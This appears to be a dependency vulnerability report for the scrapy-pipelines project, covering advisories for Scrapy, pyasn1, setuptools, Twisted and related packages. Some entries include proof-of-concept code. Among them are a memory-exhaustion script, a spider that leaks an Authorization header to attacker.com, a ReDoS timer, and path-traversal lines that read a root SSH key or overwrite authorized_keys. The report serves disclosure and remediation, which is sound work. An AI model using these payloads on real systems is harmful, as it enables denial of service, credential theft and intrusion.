critical severity
new
- Vulnerable module: pyopenssl
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › pyopenssl@25.3.0
Remediation: Upgrade to scrapy@2.4.1.
Overview
Affected versions of this package are vulnerable to Buffer Overflow via the set_cookie_generate_callback function. An attacker can cause a buffer overflow by providing a callback that returns a cookie value greater than 256 bytes.
Note:
This is only exploitable if the application explicitly uses the set_cookie_generate_callback method on an OpenSSL Context object.
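Until the upgrade is in place, a callback can defend itself by returning a fixed-size digest of peer data, which stays far below the 256-byte limit the advisory describes. A minimal sketch, assuming a callback of this shape is registered via set_cookie_generate_callback (the function name, secret handling, and use of repr() for peer data are illustrative, not pyopenssl requirements):

```python
import hashlib
import hmac
import os

SECRET = os.urandom(32)  # per-process secret for the cookie HMAC

def generate_cookie(connection):
    # Hypothetical callback body for Context.set_cookie_generate_callback.
    # The overflow requires a cookie longer than 256 bytes, so a safe
    # callback pins the length by hashing instead of echoing data back.
    peer_data = repr(connection).encode()  # stand-in for real peer address data
    cookie = hmac.new(SECRET, peer_data, hashlib.sha256).digest()
    return cookie  # always 32 bytes, far below the 256-byte limit
```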
Remediation
Upgrade pyopenssl to version 26.0.0 or higher.
References
high severity
- Vulnerable module: pyasn1
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › pyasn1@0.5.1
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › pyasn1-modules@0.3.0 › pyasn1@0.5.1
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the valueDecoder function in decoder.py. An attacker can cause memory exhaustion by submitting a malformed RELATIVE-OID containing excessive continuation octets.
PoC
import pyasn1.codec.ber.decoder as decoder
import pyasn1.type.univ as univ
import sys
import resource

# Deliberately set a memory limit so the PoC fails fast instead of
# exhausting the machine
try:
    resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))
    print("[*] Memory limit set to 100MB")
except Exception:
    print("[-] Could not set memory limit")

# Test with different payload sizes to find the DoS threshold
payload_size_mb = int(sys.argv[1])
print(f"[*] Testing with {payload_size_mb}MB payload...")
payload_size = payload_size_mb * 1024 * 1024

# Create payload with continuation octets: each 0x81 byte sets the
# continuation bit, causing repeated bit shifting in the decoder
payload = b'\x81' * payload_size + b'\x00'
length = len(payload)

# DER length encoding (supports up to 4GB)
if length < 128:
    length_bytes = bytes([length])
elif length < 256:
    length_bytes = b'\x81' + length.to_bytes(1, 'big')
elif length < 256**2:
    length_bytes = b'\x82' + length.to_bytes(2, 'big')
elif length < 256**3:
    length_bytes = b'\x83' + length.to_bytes(3, 'big')
else:
    # 4 length bytes can encode up to 4GB
    length_bytes = b'\x84' + length.to_bytes(4, 'big')

# Use an OID tag (0x06) for more aggressive parsing
malicious_packet = b'\x06' + length_bytes + payload
print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB")

try:
    print("[*] Decoding (this may take time or exhaust memory)...")
    result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())
    print('[+] Decoded successfully')
    print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')
    # Try to convert to string
    print('[*] Converting to string...')
    try:
        str_result = str(result[0])
        print(f'[+] String succeeded: {len(str_result)} chars')
        if len(str_result) > 10000:
            print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')
    except MemoryError:
        print('[-] MemoryError during string conversion!')
    except Exception as e:
        print(f'[-] {type(e).__name__} during string conversion')
except MemoryError:
    print('[-] MemoryError: Out of memory!')
except Exception as e:
    print(f'[-] Error: {type(e).__name__}: {e}')

print("\n[*] Test completed")
Remediation
Upgrade pyasn1 to version 0.6.2 or higher.
References
high severity
new
- Vulnerable module: pyasn1
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › pyasn1@0.5.1
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › pyasn1-modules@0.3.0 › pyasn1@0.5.1
Overview
Affected versions of this package are vulnerable to Uncontrolled Recursion when decoding ASN.1 data. An attacker can cause the application to crash or exhaust system memory by supplying specially crafted ASN.1 data with deeply nested SEQUENCE or SET tags using indefinite length markers.
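The shape of such input can be sketched without pyasn1 installed; only the byte construction is shown here, and the depth value is arbitrary:

```python
# Each b'\x30\x80' opens an indefinite-length SEQUENCE; each b'\x00\x00'
# is the matching end-of-contents marker. Deep nesting of these pairs is
# what drives the decoder's recursion on affected pyasn1 versions.
depth = 50  # arbitrary; real attacks use far deeper nesting
payload = b'\x30\x80' * depth + b'\x00\x00' * depth
# Do not feed `payload` to pyasn1's BER decoder on an unpatched version
# outside an isolated environment: it can crash the process.
```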
Remediation
Upgrade pyasn1 to version 0.6.3 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.14.0.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to insufficient protection against brotli decompression bombs. An attacker can cause excessive memory consumption and crash the client by sending specially crafted compressed data with extremely high compression ratios.
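The imbalance such a bomb exploits can be illustrated with a stand-in codec; zlib is used below only because it ships with the standard library, while brotli behaves the same way but more extremely:

```python
import zlib

# A repetitive 10 MB body compresses down to a few KB; a decompression
# bomb inverts that ratio against the client, so a tiny response can
# expand into an enormous in-memory body.
body = b'A' * (10 * 1024 * 1024)
compressed = zlib.compress(body, level=9)
ratio = len(body) / len(compressed)
print(f"{len(compressed)} bytes expand to {len(body)} bytes (~{ratio:.0f}:1)")
```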
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
- High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
- Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.
Remediation
Upgrade Scrapy to version 2.14.0 or higher.
References
high severity
- Vulnerable module: cryptography
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › cryptography@45.0.7
Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › pyopenssl@25.3.0 › cryptography@45.0.7
Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › cryptography@45.0.7
Overview
Affected versions of this package are vulnerable to Insufficient Verification of Data Authenticity in public key functions public_key_from_numbers, EllipticCurvePublicNumbers.public_key, load_der_public_key, and load_pem_public_key, which may reveal bits from a private key when provided with a malicious public key as input. When the application is using sect* binary curves for verification - which is a rare use case - these functions do not verify that the provided point belongs to the expected prime-order subgroup of the curve. An attacker can thus expose partial private keys or forge signatures.
Remediation
Upgrade cryptography to version 46.0.5 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Improper Resource Shutdown or Release due to the enforcement of response size limits only during the download of raw, usually-compressed response bodies and not during decompression. A malicious website being scraped could send a small response that, upon decompression, could exhaust the memory available to the process, potentially affecting any other process sharing that memory, and affecting disk usage in case of uncompressed response caching.
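On fixed versions, the existing size limits bound the decompressed body as well. A hedged settings sketch (the values are illustrative; the setting names are Scrapy's documented DOWNLOAD_MAXSIZE and DOWNLOAD_WARNSIZE):

```python
# settings.py -- illustrative values; on patched Scrapy these limits
# apply to the decompressed body, not only the raw compressed download.
DOWNLOAD_MAXSIZE = 64 * 1024 * 1024   # hard cap: larger responses are dropped
DOWNLOAD_WARNSIZE = 16 * 1024 * 1024  # soft cap: a warning is logged
```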
Remediation
Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.6.0.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure: responses from domain names whose public domain name suffix contains one or more periods are able to set cookies that are included in requests to any other domain sharing the same domain name suffix.
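The flaw amounts to suffix-only domain matching. The helper below is an illustration of that flawed check, not Scrapy's actual code:

```python
def naive_domain_match(request_host, cookie_domain):
    # Flawed check (illustrative): any shared suffix counts as same-site.
    # With a multi-label public suffix such as co.uk, this wrongly lets
    # attacker.co.uk set cookies that are then sent to victim.co.uk.
    return request_host == cookie_domain or request_host.endswith('.' + cookie_domain)

assert naive_domain_match('victim.co.uk', 'co.uk')  # the bug: accepted
```

A correct implementation consults the Public Suffix List so that cookies can never be scoped to a registry suffix like co.uk.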
Remediation
Upgrade Scrapy to version 1.8.2, 2.6.0 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure Through Sent Data due to the failure to remove the Authorization header when redirecting across domains. Because the header is exposed to unauthorized actors, an attacker can potentially hijack accounts.
PoC
class QuotesSpider(scrapy.Spider):
    name = "quotes"

    def start_requests(self):
        urls = [
            'http://mysite.com/redirect.php?url=http://attacker.com:8182/xx',
        ]
        for url in urls:
            yield scrapy.Request(
                url=url,
                cookies={'currency': 'USD', 'country': 'UY'},
                headers={'Authorization': 'Basic YWxhZGRpbjpvcGVuc2VzYW1l'},
                callback=self.parse,
            )

    def parse(self, response):
        page = response.url.split("/")[-2]
        filename = f'quotes-{page}.html'
        with open(filename, 'wb') as f:
            f.write(response.body)
        self.log(f'Saved file {filename}')
Remediation
Upgrade Scrapy to version 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Origin Validation Error due to the improper handling of the Authorization header during cross-domain redirects. An attacker can leak sensitive information by inducing the server to redirect a request with the Authorization header to a different domain.
Workarounds
1. Make sure that the Authorization header is not used, either directly or through some third-party plugin.
2. If that header is needed in some requests, add dont_redirect: True to the request.meta dictionary of those requests to disable following redirects for them.
3. If same-domain redirect support is needed on those requests, make sure you trust the target website not to redirect your requests to a different domain.
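Workaround 2 can be sketched as the keyword arguments such a request would carry (make_request_kwargs and the token value are hypothetical; dont_redirect is Scrapy's documented meta key):

```python
def make_request_kwargs(url, auth_token):
    # Hypothetical helper: the kwargs a scrapy.Request would be built with.
    return {
        "url": url,
        "headers": {"Authorization": f"Basic {auth_token}"},
        # dont_redirect tells Scrapy's RedirectMiddleware not to follow any
        # redirect for this request, so the header cannot leak cross-domain.
        "meta": {"dont_redirect": True},
    }

kwargs = make_request_kwargs("https://api.example.com/data", "dXNlcjpwYXNz")
```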
Remediation
Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the XMLFeedSpider class or any subclass that uses the default node iterator iternodes, as well as direct uses of the scrapy.utils.iterators.xmliter function. An attacker who controls a response being parsed can cause extreme CPU and memory usage during parsing.
Note:
For versions 2.6.0 to 2.11.0, the vulnerable function is open_in_browser for a response without a base tag.
Workaround
- For XMLFeedSpider, switch the node iterator to xml or html.
- For open_in_browser, before using the function, either manually review the response content to rule out a ReDoS attack, or manually define the base tag to avoid its automatic definition by open_in_browser later.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A - The string must start with the letter 'A'.
- (B|C+)+ - The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
- D - Finally, we ensure this section of the string ends with a 'D'.
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
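The same pattern can be checked in Python, whose re engine also backtracks; valid inputs match, and the near-miss endings are what trigger catastrophic backtracking as the C-runs grow:

```python
import re

# The example pattern from the text, in Python's backtracking engine.
pattern = re.compile(r'A(B|C+)+D')
for s in ('ABBD', 'ABCCCCD', 'ABCBCCCD', 'ACCCCCD'):
    assert pattern.fullmatch(s) is not None  # all listed inputs match
# A short near-miss is still fast; long runs of C before the X are not.
assert pattern.fullmatch('ACCCX') is None
```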
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the engine to work very slowly (time exponentially related to input size, as shown above), allowing an attacker to exploit this and cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.
References
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when parsing content. An attacker can cause extreme CPU and memory usage by handling a malicious response.
PoC
import re
import time
import math

def convert_size(size_bytes):
    if size_bytes == 0:
        return "0B"
    size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
    i = int(math.floor(math.log(size_bytes, 1024)))
    p = math.pow(1024, i)
    s = round(size_bytes / p, 2)
    return "%s %s" % (s, size_name[i])

END_TAG_RE = re.compile(r"<\s*/([^\s>]+)\s*>", re.S)

len_lists = [10000, 20000, 50000, 100000, 500000, 1000000]
for n in len_lists:
    st = time.time()
    header_end = '</' * n
    re.findall(END_TAG_RE, header_end)
    et = time.time()
    elapsed_time = et - st
    print(f'Execution time with len = {n} ~ {convert_size(len(header_end))}: {elapsed_time:.2f}s')
Remediation
Upgrade Scrapy to version 2.11.1 or higher.
References
high severity
- Vulnerable module: setuptools
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › zope.interface@6.4.post2 › setuptools@40.5.0
Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0
Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0
Remediation: Upgrade to txmongo@24.0.0.
Overview
Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') through the package_index module's download functions due to the unsafe usage of os.system. An attacker can execute arbitrary commands on the system by providing malicious URLs or manipulating the URLs retrieved from package index servers.
Note
Because easy_install and package_index are deprecated, the exploitation surface is reduced, but exploitation is still conceivable: social engineering, or a minor compromise of a package index, could grant remote access.
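The class of bug is ordinary shell injection: interpolating an attacker-controlled URL into a command string. The command line below is hypothetical, not setuptools' actual code; it only shows why os.system with unquoted input is dangerous and how quoting defuses it:

```python
import shlex

# Hypothetical command line (not setuptools' actual code): a crafted URL
# containing shell metacharacters smuggles in a second command.
url = "http://index.example/pkg.tar.gz; touch /tmp/pwned"
unsafe = f"curl -O {url}"             # the ';' would start a second command
safe = f"curl -O {shlex.quote(url)}"  # quoted: the URL stays one argument
print(safe)
```

The robust fix is to avoid the shell entirely, e.g. subprocess.run with an argument list, which is the direction the setuptools patch took by dropping os.system.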
Remediation
Upgrade setuptools to version 70.0.0 or higher.
References
high severity
new
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.14.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Unsafe Reflection via the Referrer-Policy header handled by RefererMiddleware(). An attacker can execute commands by supplying a malicious import path such as sys.exit in the response header which is read by the vulnerable application.
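Why a dotted path taken from a response header is dangerous can be sketched with a generic resolver (illustrative, not Scrapy's actual load_object, and the allow-list values are placeholders):

```python
import importlib

def resolve(path):
    # Generic dotted-path resolver (illustrative): the same mechanism
    # that loads a legitimate policy class will happily load sys.exit.
    module_name, _, attr = path.rpartition(".")
    return getattr(importlib.import_module(module_name), attr)

# An attacker-supplied path resolves to a function that kills the process:
assert callable(resolve("sys.exit"))

ALLOWED = {"no-referrer", "same-origin", "strict-origin"}  # placeholder values

def safe_policy(name):
    # Mitigation shape: never resolve arbitrary dotted paths taken from a
    # header; map unknown names to a safe default instead.
    return name if name in ALLOWED else "no-referrer"
```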
Workaround
This vulnerability can be avoided by disabling the middleware, setting the REFERER_ENABLED setting to False, manually setting the Referer header, or setting the referrer_policy meta key on all requests.
Remediation
Upgrade Scrapy to version 2.14.2 or higher.
References
medium severity
- Vulnerable module: twisted
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to Arbitrary Command Injection via improper input sanitization in the file upload process. An attacker can execute arbitrary commands on the target system by sending a specially crafted HTTP PUT request to upload a malicious file and subsequently triggering its execution. This can result in remote code execution and potential privilege escalation depending on the web server's permissions.
Remediation
There is no fixed version for Twisted.
References
medium severity
- Vulnerable module: twisted
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0
Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0
Remediation: Upgrade to txmongo@24.0.0.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request. Information disclosure across sessions may also be possible for reverse proxy servers using pooled connections.
Workaround
This vulnerability can be avoided by enforcing HTTP/2, as it is only vulnerable for HTTP/1.x traffic.
Remediation
Upgrade Twisted to version 24.7.0rc1 or higher.
References
medium severity
- Vulnerable module: zipp
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0
Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0
Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0
Remediation: Upgrade to txmongo@24.0.0.
Overview
Affected versions of this package are vulnerable to an Infinite Loop: an attacker can cause the application to stop responding by triggering a loop through functions in the Path module, such as joinpath, the overloaded division operator, and iterdir.
Remediation
Upgrade zipp to version 3.19.1 or higher.
References
medium severity
- Vulnerable module: setuptools
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › zope.interface@6.4.post2 › setuptools@40.5.0
Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0
Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0
Remediation: Upgrade to txmongo@24.0.0.
Overview
Affected versions of this package are vulnerable to Directory Traversal through the PackageIndex._download_url method. Due to insufficient sanitization of special characters, an attacker can write files to arbitrary locations on the filesystem with the permissions of the process running the Python code. In certain scenarios, an attacker could potentially escalate to remote code execution by leveraging malicious URLs present in a package index.
PoC
python poc.py
# Payload file: http://localhost:8000/%2fhome%2fuser%2f.ssh%2fauthorized_keys
# Written to: /home/user/.ssh/authorized_keys
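The decoding step at the heart of the issue is easy to reproduce with the standard library; the sanitization shown is one possible mitigation, not setuptools' actual fix:

```python
import os.path
from urllib.parse import unquote

# The crafted link hides an absolute path behind %2f escapes; decoding it
# without sanitization yields a write target outside the download folder.
name = "%2fhome%2fuser%2f.ssh%2fauthorized_keys"
decoded = unquote(name)
print(decoded)  # /home/user/.ssh/authorized_keys
# Keeping only the basename is one way a downloader can defuse this:
print(os.path.basename(decoded))  # authorized_keys
```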
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
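A defensive extraction routine can reject such entries before writing anything to disk. A minimal sketch in Python (the safe_extract name is illustrative; recent Python zipfile versions already sanitize some hostile names, but an explicit check makes the policy visible):

```python
import os
import zipfile

def safe_extract(zf: zipfile.ZipFile, dest: str) -> None:
    """Extract an archive only if every entry stays inside `dest`."""
    dest = os.path.abspath(dest)
    for info in zf.infolist():
        # Resolve the final on-disk path for this entry and verify it
        # cannot land outside the target extraction folder.
        target = os.path.abspath(os.path.join(dest, info.filename))
        if not (target == dest or target.startswith(dest + os.sep)):
            raise ValueError(f"blocked path traversal entry: {info.filename!r}")
    zf.extractall(dest)
```

An archive containing `../../../../../../root/.ssh/authorized_keys` fails the check on its first hostile entry, so nothing is extracted at all.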
Remediation
Upgrade setuptools to version 78.1.1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Files or Directories Accessible to External Parties via the DOWNLOAD_HANDLERS setting. An attacker can redirect traffic to unintended protocols such as file:// or s3://, potentially accessing sensitive data or credentials by manipulating the start URLs of a spider and observing the output.
Notes:
HTTP redirects should only work between URLs that use the http:// or https:// schemes. A malicious actor, given write access to the start requests of a spider and read access to the spider output, could exploit this vulnerability to:
a) Redirect to any local file using the file:// scheme to read its contents.
b) Redirect to an ftp:// URL of a malicious FTP server to obtain the FTP username and password configured in the spider or project.
